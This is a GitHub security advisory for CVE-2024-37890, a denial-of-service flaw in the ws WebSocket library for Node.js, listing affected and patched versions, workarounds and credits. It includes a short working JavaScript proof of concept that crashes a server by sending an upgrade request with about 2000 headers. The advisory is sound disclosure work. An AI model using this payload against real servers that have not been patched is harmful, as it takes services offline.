Headline
GHSA-3h5v-q93c-6h6q: ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.
Proof of concept
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
Patches
The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to [email protected] (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), [email protected] (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and [email protected] (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
Workarounds
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the
--max-http-header-size=size
and/or themaxHeaderSize
options so that no more headers than theserver.maxHeadersCount
limit can be sent. - Set
server.maxHeadersCount
to0
so that no limit is applied.
Credits
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
References
- https://github.com/websockets/ws/issues/2230
- https://github.com/websockets/ws/pull/2231
Skip to content
Navigation Menu
Actions
Automate any workflow
Packages
Host and manage packages
Security
Find and fix vulnerabilities
Codespaces
Instant dev environments
GitHub Copilot
Write better code with AI
Code review
Manage code changes
Issues
Plan and track work
Discussions
Collaborate outside of code
GitHub Sponsors
Fund open source developers
* The ReadME Project
GitHub community articles
Enterprise platform
AI-powered developer platform
- Pricing
Provide feedback
Saved searches****Use saved searches to filter your results more quickly
Sign up
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2024-37890
ws affected by a DoS when handling a request with many HTTP headers
High severity GitHub Reviewed Published Jun 16, 2024 in websockets/ws • Updated Jun 17, 2024
Package
Affected versions
>= 2.1.0, < 5.2.4
>= 6.0.0, < 6.2.3
>= 7.0.0, < 7.5.10
>= 8.0.0, < 8.17.1
Patched versions
5.2.4
6.2.3
7.5.10
8.17.1
Description
Published to the GitHub Advisory Database
Jun 17, 2024
Last updated
Jun 17, 2024
Related news
Red Hat Security Advisory 2024-6755-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.2 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Red Hat Security Advisory 2024-5547-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.1 on Red Hat Enterprise Linux 9 from Red Hat Container Registry. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-4591-03 - Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.16.0 on Red Hat Enterprise Linux 9. Issues addressed include denial of service, memory leak, and resource exhaustion vulnerabilities.